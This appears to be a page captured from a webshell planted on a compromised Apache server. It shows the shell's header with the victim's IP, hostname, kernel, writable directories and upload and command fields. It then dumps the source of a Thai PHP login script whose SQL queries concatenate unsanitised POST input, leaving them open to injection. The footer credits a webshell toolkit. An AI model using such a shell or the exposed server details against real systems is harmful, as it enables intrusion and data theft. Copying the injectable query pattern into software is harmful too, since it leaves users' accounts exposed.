403Webshell
Server IP : 182.53.201.61  /  Your IP : 216.73.217.175
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/room/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/room/member/check_logino.php
<?php
session_start(); 
ob_start();
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
                                    
include("../connect.php");  
if (isset($_GET['logoff'])  &&  $_GET['logoff']=='yes') 	{
	$_SESSION["uDept"]='NA';
	$_SESSION["cUserName"] ='Guest';
	$usr='xxxx';
} else {
	if (!isset($_SESSION["cUserName"]))$_SESSION["cUserName"] ='Guest';
	if (!isset($_SESSION["uDept"]))$_SESSION["uDept"]='NA';
	if (!isset($_SESSION["cUserID"]))$usr='xxxx';
	else $usr=$_SESSION["cUserID"];
}
if (!isset($_SESSION["Done"])) $_SESSION["Done"] = 'Y';
/* ------------------------------------------------------------------------------------------------------------------------------------------
										Authentication
 ------------------------------------------------------------------------------------------------------------------------------------------*/
if (isset($_POST['username'])) {	     
	
	$usr = trim($_POST['username']);  
	/*
		เช็ค user ด้วย UDP ผ่านโปรแกรม watchdog.exe
		ให้บริการที่ 192.168.1.2 port 8500
		รูปแบบ 'ChkUsrXXXXX#password'
		ถ้าถูกต้อง  จะได้คำตอบเป็น คำนำหน้าชื่อ;ชื่อ นามสกุล
		ถ้าไม่ถูกจะได้คำตอบเป็น UnAuth
		
	*/
	//$sock=socket_connect_timeout($host, $port, $timeout=100)	

	if(($sock = socket_create(AF_INET, SOCK_DGRAM, 0)))
	{
		// lน่าจะเป็น System local เป็น UTF8  จึงไม่ต้อง iconv( 'UTF-8','TIS-620', $reply);
		$input = 'ChkUsr'.$usr.'#'.trim($_POST['password']);
		$Login ='Na';
		Socket_set_option ($sock, SOL_SOCKET, SO_RCVTIMEO, Array ("sec" => 5, "usec" => 100));//Receive
		Socket_set_option ($sock, SOL_SOCKET, SO_SNDTIMEO, Array ("sec" => 5, "usec" => 10));//Send   
		$server = '192.168.1.2';	//SERVER หลัก
		$port = 8500;
		if (socket_sendto($sock, $input , strlen($input) , 0 , $server , $port))
		if (socket_recv ( $sock , $reply , 2045 , MSG_WAITALL ) )$Login = $reply;  // iconv( 'UTF-8','TIS-620', $reply)
		echo $Login.'<br>';
		if ($Login == 'Na'){
			$Login ='UnAuth';
			$server = '192.168.1.14';   //SERVER สำรอง
			if (socket_sendto($sock, $input , strlen($input) , 0 , $server , $port))
			if (socket_recv ( $sock , $reply , 2045 , MSG_WAITALL ) )$Login = $reply; // iconv( 'UTF-8','TIS-620', $reply)
			echo $Login.'<br>';
		}
	} else $Login ='UnAuth';
	//---------------------------------------------------------------------------
	if ($Login <>'UnAuth') {
		$_SESSION["cUserName"] = substr($Login,10);
		$cName = substr($_SESSION["cUserName"],strpos($_SESSION["cUserName"],";")+1 );
		if (strpos($cName,' ')) $cName =substr($cName ,0,strpos($cName,' '));
		$_SESSION["cUserName"] =str_replace(";","",$_SESSION["cUserName"]);
			$sql= "select * from  tb_member where name like '%".$usr."%' ";   //เช็คว่ามี usr (id) ใน  indicators ไหม
		$result=mysql_query($sql);
		while ($object = mysql_fetch_array($result)) {
		     $sql= 'ok' ;
			 break;
		}
			if ($sql=='ok'){	//พบ user ID ใน ตาราง indicator
			$sql='select * from  tb_member  where password = "'.$usr.'"';
			$result=mysql_query($sql);
			while ($object = mysql_fetch_array($result)) {  //และพบใน ตาราง Users 
				if ($object['username']<>$cName || $object['name']<>$_SESSION["cUserName"]){  //ชื่อไม่ตรงให้ update
					$sql='update tb_member  set  username = "'.$cName.'" ,name ="'.$_SESSION["cUserName"].'"  where password = "'.$usr.'"';
					$result2=mysql_query($sql);
				}
			
			if ($sql <> 'ok'){ 
				$sql='insert into  tb_member  (username ,name,password) values ("'.$cName.'" ,"'.$_SESSION["cUserName"].'" , "'.$usr.'")';
				$result=mysql_query($sql);
			}
		}
		else {   //ไม่พบ user ID ใน ตาราง indicator อาจพบใน ตาราง Users
			$sql='select * from  tb_member where password = "'.$usr.'"';
			$result=mysql_query($sql);
			while ($object = mysql_fetch_array($result)) {
				$_SESSION["uDept"] = $object['dept'];
			}
		}	
	}
	if ($_SESSION["cUserName"] =='Guest'){
		echo '<script language="javascript">';
		echo 'alert("ไม่ถูกต้อง")';
		echo '</script>';
	}
}
$_SESSION["cUserID"]=$usr;	
	
			
echo $_SESSION["cUserName"]

ob_end_flush();
$conn->close();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit